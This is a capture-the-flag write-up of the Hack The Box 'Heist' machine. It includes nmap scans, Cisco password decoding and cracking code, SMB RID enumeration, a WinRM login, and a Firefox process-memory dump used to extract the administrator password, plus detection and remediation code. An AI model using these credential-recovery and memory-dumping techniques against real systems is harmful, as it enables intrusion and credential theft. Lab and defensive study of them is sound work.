# Heist (Easy)

## Enumeration

### Nmap

```
nmap -sC -sV -oA nmap/10.10.10.149 10.10.10.149
```

```
Nmap scan report for 10.10.10.149
Host is up (0.11s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open  msrpc         Microsoft Windows RPC
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-09T16:24:17
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul  9 12:24:52 2021 -- 1 IP address (1 host up) scanned in 72.60 seconds
```

```
# Nmap 7.91 scan initiated Fri Jul  9 12:47:56 2021 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /home/kali/Boxes/Hackthebox/Hiest/results/10.10.10.149/scans/_full_tcp_nmap.txt -oX /home/kali/Boxes/Hackthebox/Hiest/results/10.10.10.149/scans/xml/_full_tcp_nmap.xml 10.10.10.149
Nmap scan report for 10.10.10.149
Host is up, received user-set (0.090s latency).
Scanned at 2021-07-09 12:47:57 EDT for 350s
Not shown: 65530 filtered ports
Reason: 65530 no-responses
PORT      STATE SERVICE       REASON  VERSION
80/tcp    open  http          syn-ack Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
445/tcp   open  microsoft-ds? syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 0s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 20087/tcp): CLEAN (Timeout)
|   Check 2 (port 48515/tcp): CLEAN (Timeout)
|   Check 3 (port 25486/udp): CLEAN (Timeout)
|   Check 4 (port 40753/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-09T16:53:10
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jul  9 12:53:47 2021 -- 1 IP address (1 host up) scanned in 350.69 seconds
```

As usual, I will start with port 80 and port 445.

### Port 80

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5NPmA8H_r9BQWiCla%2F-Mg5Ns0b2YpmMhrd05Tf%2Fimage.png?alt=media\&token=397ef684-f780-4bf0-99fa-5b684e95ee95)

We are greeted by a support login page, and it lets us log in as a guest.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5NPmA8H_r9BQWiCla%2F-Mg5P-X9EtPX7ZC0LvqU%2Fimage.png?alt=media\&token=ec75d527-d441-4da7-ac85-245de6d7d110)

Clicking the attachment posted by the user Hazard shows this:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5NPmA8H_r9BQWiCla%2F-Mg5PCMuWveUl2l4dds7%2Fimage.png?alt=media\&token=9cd10f5d-9d08-4b0c-a84a-19529c234bb6)

A bit of research shows that Cisco type 7 passwords are reversible: they are obfuscated, not hashed, so they can be decoded directly without any guessing.

We can use this [website](https://packetlife.net/toolbox/type7/) to decode them.

The type 5 password, on the other hand, is a salted MD5 hash (md5crypt), so it has to be cracked; John the Ripper handles that format.

| Type | Hash                               | Password          |
| ---- | ---------------------------------- | ----------------- |
| 7    | 02375012182C1A1D751618034F36415408 | Q4)sJu\Y8qz\*A3?d |
| 7    | 0242114B0E143F015F5D1E161713       | $uperP\@ssword    |
| 5    | $1$pdQG$o8nrSzsGXeaduXrjlvKc91     | stealth1agent     |
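To make the difference between the two storage formats concrete, here is an added example (my own code, not part of the original write-up or of any Cisco or John tool) that audits a constructed Cisco IOS config. Type 7 strings are decoded outright with Cisco's fixed XOR key stream, which is why they count as obfuscation; the type 5 hash is recomputed with md5crypt and compared against a short candidate list, which is the same work John does at scale. The config text and the usernames `user1`/`user2` are placeholders; the three credential values are the ones in the table above.

```python
"""Audit Cisco IOS credential lines: type 7 is reversible, type 5 is md5crypt.

Added example, not code from the write-up. SAMPLE_CONFIG is constructed
(usernames user1/user2 are placeholders); the two type 7 strings and the
type 5 hash are the values from the table above.
"""
import hashlib
import re

# Cisco's fixed type 7 key stream. It is the same on every device, which is
# why "password 7" is obfuscation rather than encryption.
XLAT = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
LINE_RE = re.compile(r"\b(?:password|secret)\s+([57])\s+(\S+)")


def decode_type7(encoded: str) -> str:
    """First two digits are a decimal offset into XLAT; each following hex
    byte is XORed with the next key byte. No secret is needed to reverse it."""
    seed = int(encoded[:2])
    body = bytes.fromhex(encoded[2:])
    return bytes(b ^ XLAT[(seed + i) % len(XLAT)] for i, b in enumerate(body)).decode()


def _to64(value: int, count: int) -> str:
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password: str, salt: str) -> str:
    """Unix $1$ / Cisco type 5 hash, following the FreeBSD reference code."""
    pw, magic, salt_b = password.encode(), b"$1$", salt.encode()[:8]
    ctx = hashlib.md5(pw + magic + salt_b)
    alt = hashlib.md5(pw + salt_b + pw).digest()
    remaining = len(pw)
    while remaining > 0:
        ctx.update(alt[: min(16, remaining)])
        remaining -= 16
    bit = len(pw)
    while bit:
        ctx.update(b"\x00" if bit & 1 else pw[:1])
        bit >>= 1
    final = ctx.digest()
    for i in range(1000):  # 1000 rounds: costly in 1994, cheap for a GPU today
        rnd = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            rnd.update(salt_b)
        if i % 7:
            rnd.update(pw)
        rnd.update(final if i & 1 else pw)
        final = rnd.digest()
    out = "".join(
        _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
        for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    ) + _to64(final[11], 2)
    return "$1$" + salt_b.decode() + "$" + out


def check_type5(hash_str: str, candidate: str) -> bool:
    """True if the candidate password produces this $1$salt$digest string."""
    salt = hash_str.split("$")[2]
    return md5crypt(candidate, salt) == hash_str


def audit_config(config: str, candidates=()) -> list:
    """Return (line, verdict, recovered_password_or_None) for each weak line."""
    findings = []
    for line in config.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        kind, value = m.groups()
        if kind == "7":
            findings.append((line.strip(), "type 7: reversible, decoded", decode_type7(value)))
        else:
            hit = next((w for w in candidates if check_type5(value, w)), None)
            findings.append((line.strip(), "type 5: md5crypt, fast enough to guess offline", hit))
    return findings


SAMPLE_CONFIG = """\
! constructed sample config; credential values are the ones from the table
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username user1 password 7 0242114B0E143F015F5D1E161713
username user2 privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

if __name__ == "__main__":
    for line, verdict, recovered in audit_config(SAMPLE_CONFIG, ["cisco", "stealth1agent"]):
        print(f"{verdict:48} {recovered!r:22} <- {line}")
```

The practical takeaway for anyone who owns such a device is that neither format should appear in a config that gets attached to a public support ticket: type 7 must be replaced by `secret`-style storage, and type 5 only buys time against a wordlist.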

After trying the possible user/password combinations, the pair hazard / stealth1agent finally logs in to SMB:

```
smbclient --list //10.10.10.149/IPC$ -U hazard%stealth1agent
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5NPmA8H_r9BQWiCla%2F-Mg5SI7Nf1XJ08MmznPy%2Fimage.png?alt=media\&token=c043ccba-7a0f-4a65-9158-90d6dbe29a2a)

Next, I use **impacket-lookupsid** to find other users by cycling through RIDs with the credentials we have.

```
impacket-lookupsid hazard:stealth1agent@10.10.10.149
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5SMFYSxj9SWL3eTVx%2F-Mg5SeUasK9dBdXcoV9O%2Fimage.png?alt=media\&token=7a59bfe2-740c-4c51-98d1-841bbf80e8a1)

The output shows two more users, **Chase** and **Jason**.

From the full TCP nmap scan, we know that port 5985 is WinRM, which lets us log in to the system remotely once we have valid credentials.

## User

We can log in as user **Chase** with the password **Q4)sJu\Y8qz\*A3?d**:

```
evil-winrm -i 10.10.10.149 -u Chase -p "Q4)sJu\Y8qz*A3?d"
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5SMFYSxj9SWL3eTVx%2F-Mg5TKleRtZ6L-yW50yh%2Fimage.png?alt=media\&token=930bba26-777b-48ef-830d-26c7848f35b4)

Got the user flag!

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5Te2YuYj-10RSfIkw%2F-Mg5U7WMnFiIr_o9kIwW%2Fimage.png?alt=media\&token=898264d5-06ac-4bf1-a298-9d6eb61b872a)

## Privilege Escalation

After some enumeration, we can see that Mozilla Firefox is installed on the machine.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5Te2YuYj-10RSfIkw%2F-Mg5Uk4UeV2_QKTjjnVY%2Fimage.png?alt=media\&token=daa369c8-7e5b-452d-b7bb-40780cb48e73)

The `ps` command shows that a few Firefox processes are running.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5Te2YuYj-10RSfIkw%2F-Mg5VZnH-4WrtzrD7K5b%2Fimage.png?alt=media\&token=af544af3-9e13-485a-b720-7f9fa13fd781)

We can use [ProcDump64](https://api.256file.com/procdump64.exe/en-download-190118.html) to dump the memory of one of these processes, then use [strings](https://ss64.com/nt/strings.html) to pull the readable text out of the dump.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5Te2YuYj-10RSfIkw%2F-Mg5Xb8W-oNctGHm82u7%2Fimage.png?alt=media\&token=5e7f7e0e-0373-47f2-b1cc-37a905687cec)

```
./procdump64.exe -accepteula -ma 6728
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5Te2YuYj-10RSfIkw%2F-Mg5YNlt5r4jlQ2_0qZv%2Fimage.png?alt=media\&token=3f05b582-6aa1-4b2c-b2e6-72d2a26bab57)

A full memory dump (`-ma`) of the process is created.

Now we can use strings.exe to write the readable strings from the dump to a file.
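From the defender's side, this dump is the step worth alerting on. The following added example (my own code, not from the write-up) shows the detection logic over Sysmon ProcessAccess events: Sysmon writes Event ID 10 whenever one process opens a handle to another, and a full dump needs the PROCESS_VM_READ right, so the rule keys on that access bit and on a set of processes whose memory is expected to hold secrets. The `SAMPLE_EVENTS` list is constructed: the field names are Sysmon's, the paths, times and the `ExampleEDR` allowlist entry are placeholders, and the pid 6728 is the Firefox process dumped above.

```python
"""Flag reads of credential-bearing process memory from Sysmon ProcessAccess events.

Added example, not from the write-up. Sysmon writes Event ID 10 whenever one
process opens a handle to another, with the fields used below (SourceImage,
TargetImage, TargetProcessId, GrantedAccess). SAMPLE_EVENTS is constructed:
the field names are Sysmon's, the paths and times are invented, and pid 6728
is the Firefox process dumped above.
"""
# Access-mask bits from the Windows process security model.
PROCESS_VM_READ = 0x0010                    # required to read another process's memory
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000  # enough to list a process, not to read it

# Processes whose memory is expected to hold secrets.
WATCHED_TARGETS = {"firefox.exe", "chrome.exe", "msedge.exe", "lsass.exe"}


def image_name(path: str) -> str:
    """Base name of an image path, lower-cased, so rules match regardless of install dir."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def reads_memory(granted_access: str) -> bool:
    """GrantedAccess is logged as a hex string such as 0x1FFFFF or 0x1010."""
    return int(granted_access, 16) & PROCESS_VM_READ != 0


def detect_memory_reads(events, allowed_sources=frozenset()) -> list:
    """Alert on any non-allowlisted process that opens a watched process with
    VM_READ access. MiniDumpWriteDump (what procdump -ma calls) needs exactly
    that right, so the rule does not depend on the dumping tool's file name."""
    allowed = {s.lower() for s in allowed_sources}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 10:
            continue
        target = image_name(ev["TargetImage"])
        source = ev["SourceImage"].lower()
        if target in WATCHED_TARGETS and reads_memory(ev["GrantedAccess"]) and source not in allowed:
            alerts.append(
                f"{ev['UtcTime']} {source} opened {target} (pid {ev['TargetProcessId']}) "
                f"with GrantedAccess {ev['GrantedAccess']}"
            )
    return alerts


FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"
SAMPLE_EVENTS = [  # constructed, not a capture from the box
    {"EventID": 10, "UtcTime": "2021-07-09 16:40:01.000",
     "SourceImage": r"C:\Users\Chase\Desktop\procdump64.exe",
     "TargetImage": FIREFOX, "TargetProcessId": 6728, "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "UtcTime": "2021-07-09 16:40:02.000",
     "SourceImage": r"C:\Program Files\ExampleEDR\agent.exe",  # placeholder allowlisted agent
     "TargetImage": FIREFOX, "TargetProcessId": 6728, "GrantedAccess": "0x1010"},
    {"EventID": 10, "UtcTime": "2021-07-09 16:40:03.000",
     "SourceImage": r"C:\Windows\explorer.exe",
     "TargetImage": FIREFOX, "TargetProcessId": 6728, "GrantedAccess": "0x1000"},
    {"EventID": 1, "UtcTime": "2021-07-09 16:40:04.000", "Image": r"C:\Windows\System32\cmd.exe"},
]
ALLOWED_SOURCES = {r"C:\Program Files\ExampleEDR\agent.exe"}

if __name__ == "__main__":
    for alert in detect_memory_reads(SAMPLE_EVENTS, ALLOWED_SOURCES):
        print(alert)
```

Only the first event fires: the placeholder EDR agent is allowlisted, and explorer.exe opened Firefox with query-limited access only, which is the normal background noise on a workstation.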

```
./strings.exe -accepteula firefox.exe_210802_163838.dmp > readable.txt
```

After that, we can download the file of readable strings to our own machine.

Searching that file for the password in Sublime shows this:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5Te2YuYj-10RSfIkw%2F-Mg5ZTyAP-w8jJ_K1o0z%2Fimage.png?alt=media\&token=2e0aaa43-548c-4642-bd24-125a8fbddb71)
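What strings.exe and the search are doing here is simple enough to show end to end. The added example below (my own code, not the write-up's) implements a minimal strings.exe work-alike that, like the Sysinternals tool and unlike plain GNU `strings`, scans for both ASCII and UTF-16LE runs (Windows keeps most in-memory text as UTF-16), then picks out URL-shaped strings whose query string carries a password-like parameter. `build_sample_dump()` is a constructed byte buffer standing in for a slice of the Firefox dump, and the form field names `username`/`password` and the values in it are placeholders.

```python
"""Minimal strings.exe work-alike plus a search for credentials inside URLs.

Added example, not the write-up's code. build_sample_dump() is a constructed
byte buffer standing in for a slice of the firefox.exe dump: ASCII text,
UTF-16LE text (how Windows keeps most strings in memory) and binary noise.
The form field names username/password are placeholders.
"""
import re
from urllib.parse import parse_qs, urlsplit

MIN_LEN = 4  # strings.exe's default minimum run length
ASCII_RE = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)
SENSITIVE = ("password", "passwd", "pwd")


def extract_strings(data: bytes) -> list:
    """Printable ASCII and UTF-16LE runs, in file-offset order. GNU strings
    only finds the ASCII ones unless told otherwise (-el); Sysinternals
    strings.exe scans both encodings by default."""
    found = [(m.start(), m.group().decode("ascii")) for m in ASCII_RE.finditer(data)]
    found += [(m.start(), m.group().decode("utf-16-le")) for m in WIDE_RE.finditer(data)]
    return [s for _, s in sorted(found)]


def find_url_secrets(strings: list) -> list:
    """(parameter, value) pairs for password-like query parameters in any
    URL-shaped string. A login form submitted with GET puts the password in
    the URL, and that URL then lives on in process memory, history and logs."""
    hits = []
    for s in strings:
        if "?" not in s or "=" not in s:
            continue
        try:
            query = urlsplit(s).query
        except ValueError:  # not a parseable URL
            continue
        for key, values in parse_qs(query).items():
            if any(word in key.lower() for word in SENSITIVE):
                hits.extend((key, v) for v in values)
    return hits


def scan_dump(data: bytes) -> list:
    """The whole pipeline: strings, then the search."""
    return find_url_secrets(extract_strings(data))


def build_sample_dump() -> bytes:
    """Constructed stand-in for a process dump, not real Firefox memory."""
    noise = bytes(range(32)) * 8  # control bytes only: never part of a string
    ascii_url = b"http://localhost/login.php?username=EXAMPLE_USER&password=EXAMPLE_PASS%21"
    wide_title = "Support Login Page - Mozilla Firefox".encode("utf-16-le")
    wide_url = "https://intranet.example/login.php?username=demo&password=p%40ss".encode("utf-16-le")
    return noise + ascii_url + b"\x00" * 3 + noise + wide_title + noise + wide_url + b"\x00\x00" + noise


if __name__ == "__main__":
    for key, value in scan_dump(build_sample_dump()):
        print(f"{key}={value}")
```

Both the ASCII and the wide URL are recovered and both passwords are reported, with percent-encoding undone; the window title shows up in the strings list but is ignored by the search because it is not URL-shaped. The fix on the application side is to submit login forms with POST and to avoid echoing credentials into URLs at all, since anything in a URL is readable by exactly this kind of pass over memory.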

Then we can log in as administrator using the password shown.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5Te2YuYj-10RSfIkw%2F-Mg5_Us6A2GS7mv-eNqv%2Fimage.png?alt=media\&token=f07136d3-aae7-4275-8666-61a466b0451d)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5Te2YuYj-10RSfIkw%2F-Mg5_d4WAj9DtdL6W9qu%2Fimage.png?alt=media\&token=8aa7dc9e-8242-4647-b0f9-fce32f874574)

Congratz!
